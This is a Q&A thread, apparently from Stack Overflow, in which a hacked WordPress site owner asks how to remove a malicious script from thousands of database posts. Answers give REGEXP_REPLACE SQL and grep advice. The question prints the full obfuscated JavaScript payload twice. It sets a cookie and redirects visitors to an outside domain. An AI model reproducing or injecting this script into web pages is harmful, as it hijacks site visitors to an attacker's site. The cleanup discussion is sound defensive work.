# Remove script injected into wordpress database

Tags: sql, wordpress

My website got hacked and is now redirecting all new visitors to a shitty website.

I changed all passwords I can think of, installed Wordfence (I'm on wordpress), removed all malicious code from files.

Now I am left with close to 5000 posts in wp_posts table that still contain the same malicious code.
Namely this:

```
<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https://www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\x20path=/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](/Android/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/BlackBerry/i)||navigator['userAgent'][_0x287a('0xd')](/iPhone|iPad|iPod/i)||navigator[_0x287a('0xe')]['match'](/Opera Mini/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/IEMobile/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};</script>
```

I tried

```
UPDATE `wp_posts` SET post_content = REPLACE (post_content, "<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https://www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\x20path=/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](/Android/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/BlackBerry/i)||navigator['userAgent'][_0x287a('0xd')](/iPhone|iPad|iPod/i)||navigator[_0x287a('0xe')]['match'](/Opera Mini/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/IEMobile/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};</script>", " ")
```

But I get `#1064 - Something is wrong in your syntax near'"<script>var _0x2cf4=['MSIE)' in line 1`

Thanks for any help.

Comment: would using a regex work ? like all "<script>var _0x2cf4=.*</script>" would not include useful scripts? see syntax at (for example) https://stackoverflow.com/questions/986826/how-to-do-a-regular-expression-replace-in-mysql

Comment: https://stackoverflow.com/questions/30353935/to-find-and-replace-escaped-quotes-in-mysql-table also has a useful way to test what would be changed (content<>...)

Answer (score 4):

Thanks to @B. Go I came up with:

```
    UPDATE wp_posts 
SET         
    post_content = REGEXP_REPLACE(post_content,"<script>var _0x2cf4=.*</script>"," ")
WHERE
    post_content RLIKE "<script>var _0x2cf4=.*</script>"
```

Still can't rid of malicious code on one page, but it doesn't seem to be in the DB.

Comment: I think your first problem was about the mix of " and ', but it seemed easier to use .* than escaping all the quotes, or whatever that working syntax would have been...

Answer (score 1):

Using REGXP function in mysql

```
UPDATE wp_posts SET post_content = REGEXP_REPLACE(post_content,'<script type="text/javascript">.*</script>'," ") WHERE post_content REGEXP('<script type="text/javascript">.*</script>')
```

Answer (score 0):

if the malicious code exist in every post, you might need to check your head and footer file which appear in every post and also core js files that could contain malicious code.

Also check if any external js being called when loading page.

If you can ssh to your file, you can `grep -nr "var _0x2cf4="` to target the files.

Hope it helps, thanks

Answer (score 0):

Please, read this answer from one good guy:

https://wordpress.stackexchange.com/questions/357465/removing-malware-appended-to-each-post/358141#358141

Hope this helps